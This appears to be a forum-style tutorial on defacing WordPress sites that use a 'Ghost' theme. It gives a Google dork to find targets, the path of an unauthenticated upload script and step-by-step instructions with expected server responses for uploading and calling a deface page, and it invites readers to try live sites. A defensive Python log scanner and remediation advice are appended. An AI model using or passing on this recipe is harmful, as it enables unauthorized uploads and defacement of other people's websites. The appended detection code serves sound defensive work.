Dork
- inurl:wp-content/theme/Ghost
Exploit
- /wp-content/themes/Ghost/included/uploadfile3/upload_settings_image.php
Since I'm nice, I'll give you a live target
First, run the dork in Google / Chrome
Then enter the exploit
If it's vulnerable, you get the text " {"status":"NOK", "ERR":"This file is incorect"} "
Now, once that text shows up
Just go to the CSRF
In the post file field, enter Filedata
When that's done, press kunci sempai
After that, upload your deface script
Press kunci sempai again
If the upload succeeds, you get the text " {"status":"OK","imageID":"nama file kalian html","imageName":"nama file kalian.html","html":"\n\t\n\t\t
html File<\/div><\/td>\n\t\tasu.html
\n\t\t\t[Delete]<\/a>\n\t\t<\/td>\n\t<\/tr>\n"} "
How to call up your deface script: " https://www.target.com/wp-content/uploads/settingsimages/sc deface kalian "
If you don't understand, feel free to ask in the comments section
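For site owners, the sequence above leaves a recognizable trail in the web server access log: a visit to the theme's upload script, a POST to it, then a fetch of a non-image file from the settingsimages directory. The following is an added example, not part of the original post, that flags those three events; the Combined Log Format, the image-extension list and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Paths taken from the post; compared case-insensitively.
UPLOAD_ENDPOINT = "/wp-content/themes/ghost/included/uploadfile3/upload_settings_image.php"
UPLOAD_DIR = "/wp-content/uploads/settingsimages/"
IMAGE_EXT = (".jpg", ".jpeg", ".png", ".gif")  # assumption: legitimate settings images

# Combined Log Format: ip - user [time] "METHOD target PROTO" status size ...
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+)[^"]*" (\d{3}) ')

def classify(line):
    """Return (ip, time, finding) for a suspicious log line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, when, method, target, status = m.groups()
    path = unquote(urlsplit(target).path).lower()
    if path == UPLOAD_ENDPOINT:
        # A plain visit is the vulnerability check; a POST is an upload attempt.
        kind = "upload-attempt" if method == "POST" else "endpoint-probe"
        return ip, when, kind
    # Anything served from the upload directory that is not an image is suspect.
    if path.startswith(UPLOAD_DIR) and status == "200" and not path.endswith(IMAGE_EXT):
        return ip, when, "non-image-served"
    return None

def scan(lines):
    """Classify every line and keep only the findings, in log order."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample lines (documentation IP ranges, made-up timestamps and sizes).
_EP = "/wp-content/themes/Ghost/included/uploadfile3/upload_settings_image.php"
_UA = '"-" "Mozilla/5.0"'
SAMPLE = [
    f'203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET {_EP} HTTP/1.1" 200 48 {_UA}',
    f'203.0.113.7 - - [10/Oct/2023:13:56:02 +0000] "POST {_EP} HTTP/1.1" 200 310 {_UA}',
    f'203.0.113.7 - - [10/Oct/2023:13:56:20 +0000] "GET /wp-content/uploads/settingsimages/x.html HTTP/1.1" 200 1024 {_UA}',
    f'198.51.100.4 - - [10/Oct/2023:14:01:00 +0000] "GET /wp-content/uploads/settingsimages/logo.png HTTP/1.1" 200 2048 {_UA}',
    f'198.51.100.4 - - [10/Oct/2023:14:02:00 +0000] "GET /index.php HTTP/1.1" 200 5120 {_UA}',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

Any hit on the upload script itself is worth investigating, since the post shows it answering without a login; removing or access-restricting that file and disabling script and HTML handling in the uploads directory closes the path.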